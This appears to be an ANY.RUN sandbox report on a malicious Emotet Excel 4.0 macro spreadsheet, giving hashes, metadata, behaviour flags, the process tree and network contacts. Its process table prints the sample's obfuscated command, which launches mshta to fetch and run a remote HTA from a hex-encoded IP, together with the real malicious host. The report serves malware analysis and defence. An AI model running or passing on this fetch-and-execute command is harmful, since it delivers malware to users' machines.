analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls

Full analysis: https://app.any.run/tasks/a84e0f5d-70de-499d-a61f-d4da26cc9e91
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: January 25, 2022, 04:19:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros40
emotet-doc
emotet
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 20 19:00:43 2022, Last Saved Time/Date: Thu Jan 20 19:07:37 2022, Security: 0
MD5:

3F7F1F6050609317474B8F48EFA00E88

SHA1:

C95BFBC3794A4371D3B5A6702052D662DEE19A15

SHA256:

ADE5C2C45C5BBAE939364326AE43A74C8B0C93307B7C653B12B80CBE8E891B70

SSDEEP:

1536:bpEk3hbdlylKsgqopeJBWhZFGkE+cL2NdA8eXZiozeOgXVZKyaZpvyR1kZkJvU+:bCk3hbdlylKsgqopeJBWhZFGkE+cL2Nr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 1408)

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 1408)

  • SUSPICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 3732)

    • Reads default file associations for system extensions

      • EXCEL.EXE (PID: 1408)

    • Checks supported languages

      • cmd.exe (PID: 3732)
      • mshta.exe (PID: 2332)

    • Reads the computer name

      • mshta.exe (PID: 2332)

    • Reads Microsoft Outlook installation path

      • mshta.exe (PID: 2332)

  • INFO

    • Reads the computer name

      • EXCEL.EXE (PID: 1408)

    • Checks supported languages

      • EXCEL.EXE (PID: 1408)

    • Creates files in the user directory

      • EXCEL.EXE (PID: 1408)

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 1408)

    • Reads internet explorer settings

      • mshta.exe (PID: 2332)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: xXx
LastModifiedBy: xXx
Software: Microsoft Excel
CreateDate: 2022:01:20 19:00:43
ModifyDate: 2022:01:20 19:07:37
Security: None
CodePage: Windows Cyrillic
Company: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • Sheet2
  • Sheet1
  • BLC
HeadingPairs:
  • Worksheets
  • 2
  • Excel 4.0 Macros
  • 1
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs mshta.exe

Process information

PID
CMD
Path
Indicators
Parent process
1408"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
3732cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.htmlC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2332mshta http://0xb907d607/fer/fe2.htmlC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Total events
1 911
Read events
1 815
Write events
85
Delete events
11

Modification events

(PID) Process:(1408) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:writeName:!$?
Value:
21243F0080050000010000000000000000000000
(PID) Process:(1408) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(1408) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(1408) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(1408) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(1408) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(1408) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(1408) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(1408) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(1408) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
Executable files
0
Suspicious files
1
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
1408EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRE811.tmp.cvr
MD5:
SHA256:
1408EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls.LNKlnk
MD5:66A6EA2A4509637F45EA8908F3389D6C
SHA256:12B6E0B869C2EB0421511BDAFB20CE6288A0A05C63D757E7AC08D9EB70639B9B
1408EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.datini
MD5:105A209345F69A8DF243BCB9A739ABC2
SHA256:C114D70146ED4D9DA72D86BD4E967168433A825020139060BC3E630F58DE83C9
1408EXCEL.EXEC:\Users\admin\Desktop\2A241000document
MD5:AC53CDC95B697CACF0A8C5990EF3CDEB
SHA256:D8C913358B28D12B8B5B835E9653EE39D0E1AED1C18BAD579CDBBCED1C21FAA2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2332
mshta.exe
GET
185.7.214.7:80
http://185.7.214.7/fer/fe2.html
FR
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2332
mshta.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls